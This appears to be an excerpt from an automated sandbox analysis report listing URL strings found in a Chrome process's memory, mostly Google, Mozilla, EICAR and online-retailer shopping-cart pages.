                    Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                    Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                    Source: chrome.exe, 00000009.00000002.57293972178.0000781C03080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org
                    Source: chrome.exe, 00000009.00000002.57297912927.0000781C03554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/
                    Source: chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297723078.0000781C03518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
                    Source: chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/&Download
                    Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.electronicexpress.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.etsy.com/cart/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eyebuydirect.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fingerhut.com/cart/index
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.finishline.com/store/cart/cart.jsp
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.freepeople.com/cart/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gamestop.com/cart/
                    Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                    Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223510159.0000781C02CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: chrome.exe, 00000009.00000003.57225344845.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291047704.0000781C02BF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303602200.0000781C041A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293684924.0000781C03014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/0
                    Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/0B
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/0B4
                    Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/0BJ
                    Source: chrome.exe, 00000009.00000003.57223510159.0000781C02CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
                    Source: chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CH
                    Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
                    Source: chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHy
                    Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
                    Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
                    Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                    Source: chrome.exe, 00000009.00000003.57223510159.0000781C02CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
                    Source: chrome.exe, 00000009.00000002.57292238414.0000781C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292673388.0000781C02E6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                    Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://login.live.com/
                    Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
                    Source: chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57288401902.0000781C02790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
                    Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                    Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295311582.0000781C0326C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=adobe
                    Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287586656.0000781C025C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285101049.0000781C02204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=at
                    Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297148446.0000781C03488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296034126.0000781C03378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285101049.0000781C02204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=autoit
                    Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286364303.0000781C02390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=bios320.exe
                    Source: chrome.exe, 00000009.00000002.57289202473.0000781C02998000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A55000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
                    Source: chrome.exe, 00000009.00000002.57286364303.0000781C02390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=firefox
                    Source: chrome.exe, 00000009.00000002.57296034126.0000781C03378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=java
                    Source: chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293010625.0000781C02EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=testzentrum
                    Source: chrome.exe, 00000009.00000002.57293010625.0000781C02EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGMS
                    Source: chrome.exe, 00000009.00000002.57287720778.0000781C0264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223675846.0000781C0264C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                    Source: chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                    Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                    Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aidaDevToolsConsoleInsights
                    Source: chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aidax
                    Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                    Source: chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                    Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupon.com/cart
                    Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: chrome.exe, 00000009.00000002.57289202473.0000781C02998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                    Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.guitarcenter.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.homedepot.com/mycart/home
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hottopic.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hsn.com/checkout/bag
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcpenney.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcrew.com/checkout/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.joann.com/cart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.kohls.com/checkout/shopping_cart.jsp
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.landsend.com/shopping-bag/
                    Source: chrome.exe, 00000009.00000002.57288458289.0000781C027A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lowes.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lulus.com/checkout/bag
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.macys.com/my-bag
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.midwayusa.com/cart
                    Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286571044.0000781C023C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release1.2.164946
                    Source: chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release7
                    Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
                    Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298769987.0000781C03648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286571044.0000781C023C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
                    Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/#
                    Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0
                    Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0B
                    Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/ODownload
                    Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/e
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.neimanmarcus.com/checkout/cart.jsp
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nike.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nordstrom.com/shopping-bag
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setup
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.officedepot.com/cart/shoppingCart.do
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.opticsplanet.com/checkout/cart
                    Source: chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oracle.com/search/results
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.otterbox.com/en-us/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.overstock.com/cart
                    Source: chrome.exe, 00000009.00000002.57290283503.0000781C02AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.petsmart.com/cart/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pier1.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pokemoncenter.com/cart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.potterybarn.com/shoppingcart/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qvc.com/checkout/cart.html
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.redbubble.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rei.com/ShoppingCart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.revolve.com/r/ShoppingBag.jsp
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rockauto.com/en/cart/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.saksfifthavenue.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.samsclub.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sephora.com/basket
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.shutterfly.com/cart/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.staples.com/cc/mmx/cart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sweetwater.com/store/cart.php
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.talbots.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.target.com/cart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.teacherspayteachers.com/Cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.therealreal.com/cart
                    Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tractorsupply.com/TSCShoppingCartView
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ulta.com/bag
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.underarmour.com/en-us/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.urbanoutfitters.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.vitalsource.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walgreens.com/cart/view-ui
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walmart.com/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.westelm.com/shoppingcart/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wiley.com/en-us/cart
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wish.com/cart
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                    Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                    Source: chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zappos.com/cart
                    Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zazzle.com/co/cart
                    Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zennioptical.com/shoppingCart
